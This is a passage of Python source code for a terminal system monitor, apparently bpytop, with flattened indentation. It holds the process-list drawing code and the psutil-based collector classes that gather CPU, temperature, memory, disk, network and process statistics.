g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count == 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
proc_counter: int = 1
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
'''This is meant to run in it's own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
if ProcCollector in cls.collect_queue:
cls.proc_counter = 1
else:
cls.collect_queue = list(cls.__subclasses__())
if CONFIG.proc_update_mult > 1:
if cls.proc_counter > 1:
cls.collect_queue.remove(ProcCollector)
if cls.proc_counter == CONFIG.proc_update_mult:
cls.proc_counter = 0
cls.proc_counter += 1
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_upper: List[int] = []
cpu_lower: List[int] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
sensor_swap: bool = False
cpu_temp_only: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
cls.sensor_method = "psutil"
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = bool(cls.sensor_method)
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False)))
if len(cls.cpu_usage[0]) > Term.width * 4:
del cls.cpu_usage[0][0]
cpu_times_percent = psutil.cpu_times_percent()
for x in ["upper", "lower"]:
if getattr(CONFIG, "cpu_graph_" + x) == "total":
setattr(cls, "cpu_" + x, cls.cpu_usage[0])
else:
getattr(cls, "cpu_" + x).append(round(getattr(cpu_times_percent, getattr(CONFIG, "cpu_graph_" + x))))
if len(getattr(cls, "cpu_" + x)) > Term.width * 4:
del getattr(cls, "cpu_" + x)[0]
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(round(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if hasattr(psutil.cpu_freq(), "current"):
cls.cpu_freq = round(psutil.cpu_freq().current)
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
else:
pass
cls.load_avg = [round(lavg, 2) for lavg in psutil.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3].replace(" days,", "d").replace(" day,", "d")
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int = 1000
cores: List[int] = []
core_dict: Dict[int, int] = {}
entry_int: int = 0
cpu_type: str = ""
c_max: int = 0
s_name: str = "_-_"
s_label: str = "_-_"
if cls.sensor_method == "psutil":
try:
if CONFIG.cpu_sensor != "Auto":
s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
for name, entries in psutil.sensors_temperatures().items():
for num, entry in enumerate(entries, 1):
if name == s_name and (entry.label == s_label or str(num) == s_label) and round(entry.current) > 0:
if entry.label.startswith("Package"):
cpu_type = "intel"
elif entry.label.startswith("Tdie"):
cpu_type = "ryzen"
else:
cpu_type = "other"
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current") and round(entry.current) > 0:
if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0:
if entry.label.startswith(("Core", "Tccd")):
entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
if entry_int in core_dict and cpu_type != "ryzen":
if c_max == 0:
c_max = max(core_dict) + 1
if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict:
core_dict[(entry_int + c_max)] = round(entry.current)
continue
elif entry_int in core_dict:
continue
core_dict[entry_int] = round(entry.current)
continue
elif cpu_type in ["intel", "ryzen"]:
continue
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high or cls.sensor_swap:
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if core_dict:
if not temp or temp == 1000:
temp = sum(core_dict.values()) // len(core_dict)
if not cls.cpu_temp_high or not cls.cpu_temp_crit:
cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
cls.cpu_temp[0].append(temp)
if cpu_type == "ryzen":
ccds: int = len(core_dict)
cores_per_ccd: int = CORES // ccds
z: int = 1
for x in range(THREADS):
if x == CORES:
z = 1
if CORE_MAP[x] + 1 > cores_per_ccd * z:
z += 1
if z in core_dict:
cls.cpu_temp[x+1].append(core_dict[z])
else:
for x in range(THREADS):
if CORE_MAP[x] in core_dict:
cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])
elif len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cls.cpu_temp[0].append(temp)
if len(cores) > 1:
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()]
if len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", universal_newlines=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
cls.cpu_temp[0].append(temp)
if not core_dict and len(cores) <= 1:
cls.cpu_temp_only = True
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
if cls.cpu_temp[n]:
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
disks_io_dict: Dict[str, Dict[str, List[int]]] = {}
recheck_diskutil: bool = True
diskutil_map: Dict[str, str] = {}
io_error: bool = False
old_disks: List[str] = []
old_io_disks: List[str] = []
fstab_filter: List[str] = []
excludes: List[str] = ["squashfs", "nullfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string_r: str
io_string_w: str
u_percent: int
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=SYSTEM != "BSD", nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
if SYSTEM == "MacOS" and cls.recheck_diskutil:
cls.recheck_diskutil = False
try:
dutil_out = subprocess.check_output(["diskutil", "list", "physical"], universal_newlines=True)
for line in dutil_out.split("\n"):
line = line.replace("\u2068", "").replace("\u2069", "")
if line.startswith("/dev/"):
xdisk = line.split()[0].replace("/dev/", "")
elif "Container" in line:
ydisk = line.split()[3]
if xdisk and ydisk:
cls.diskutil_map[xdisk] = ydisk
xdisk = ydisk = ""
except:
pass
if CONFIG.use_fstab and SYSTEM != "MacOS" and not cls.fstab_filter:
try:
with open('/etc/fstab','r') as fstab:
for line in fstab:
line = line.strip()
if line and not line.startswith('#'):
mount_data = (line.split())
if mount_data[2].lower() != "swap":
cls.fstab_filter += [mount_data[1]]
errlog.debug(f'new fstab_filter set : {cls.fstab_filter}')
except IOError:
CONFIG.use_fstab = False
errlog.warning(f'Error reading fstab, use_fstab flag reset to {CONFIG.use_fstab}')
if not CONFIG.use_fstab and cls.fstab_filter:
cls.fstab_filter = []
errlog.debug(f'use_fstab flag has been turned to {CONFIG.use_fstab}, fstab_filter cleared')
for disk in psutil.disk_partitions(all=CONFIG.use_fstab or not CONFIG.only_physical):
disk_io = None
io_string_r = io_string_w = ""
if CONFIG.use_fstab and disk.mountpoint not in cls.fstab_filter:
continue
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)):
continue
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
pass
u_percent = round(getattr(disk_u, "percent", 0))
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM != "BSD":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if not dev_name in io_counters:
for names in io_counters:
if names in dev_name:
disk_io = io_counters[names]
break
else:
if cls.diskutil_map:
for names, items in cls.diskutil_map.items():
if items in dev_name and names in io_counters:
disk_io = io_counters[names]
else:
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp)) #type: ignore
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp)) #type: ignore
if not disk.device in cls.disks_io_dict:
cls.disks_io_dict[disk.device] = {"read" : [], "write" : [], "rw" : []}
cls.disks_io_dict[disk.device]["read"].append(disk_read >> 20)
cls.disks_io_dict[disk.device]["write"].append(disk_write >> 20)
cls.disks_io_dict[disk.device]["rw"].append((disk_read + disk_write) >> 20)
if len(cls.disks_io_dict[disk.device]["read"]) > MemBox.width:
del cls.disks_io_dict[disk.device]["read"][0], cls.disks_io_dict[disk.device]["write"][0], cls.disks_io_dict[disk.device]["rw"][0]
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if CONFIG.io_mode or MemBox.disks_width > 30:
if disk_read > 0:
io_string_r = f'▲{floating_humanizer(disk_read, short=True)}'
if disk_write > 0:
io_string_w = f'▼{floating_humanizer(disk_write, short=True)}'
if CONFIG.io_mode:
cls.disks[disk.device]["io_r"] = io_string_r
cls.disks[disk.device]["io_w"] = io_string_w
elif disk_read + disk_write > 0:
io_string_r += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string_r + (" " if io_string_w and io_string_r else "") + io_string_w
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if cls.old_disks != list(cls.disks) or cls.old_io_disks != list(cls.disks_io_dict):
MemBox.redraw = True
cls.recheck_diskutil = True
cls.old_disks = list(cls.disks)
cls.old_io_disks = list(cls.disks_io_dict)
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
#* Stats structure = stats[netword device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
net_iface: str = CONFIG.net_iface
sync_top: int = 0
sync_string: str = ""
address: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nics = []
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
if cls.net_iface and cls.net_iface in cls.nics:
cls.nic = cls.net_iface
cls.nic_i = cls.nics.index(cls.nic)
@classmethod
def switch(cls, key: str):
if cls.net_iface: cls.net_iface = ""
if len(cls.nics) < 2 and cls.nic in cls.nics:
return
if cls.nic_i == -1:
cls.nic_i = 0 if key == "n" else -1
else:
cls.nic_i += +1 if key == "n" else -1
cls.nic_i %= len(cls.nics)
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if sorted(cls.nics) != sorted(nic for nic in up_stat if up_stat[nic].isup):
old_nic = cls.nic
cls._get_nics()
cls.nic = old_nic
if cls.nic not in cls.nics:
cls.nic_i = -1
else:
cls.nic_i = cls.nics.index(cls.nic)
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat:
cls._get_nics()
if not cls.nic: return
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
pass
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
if cls.nic in psutil.net_if_addrs():
cls.address = getattr(psutil.net_if_addrs()[cls.nic][0], "address", "")
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
case_sensitive: bool = False
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
sort_expr: Dict = {}
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
'''List all processess with pid, name, arguments, threads, username, memory percent and cpu percent'''
if not "proc" in Box.boxes: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: List[str] = []
if cls.search_filter:
if cls.case_sensitive:
search = [i.strip() for i in cls.search_filter.split(",")]
else:
search = [i.strip() for i in cls.search_filter.lower().split(",")]
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
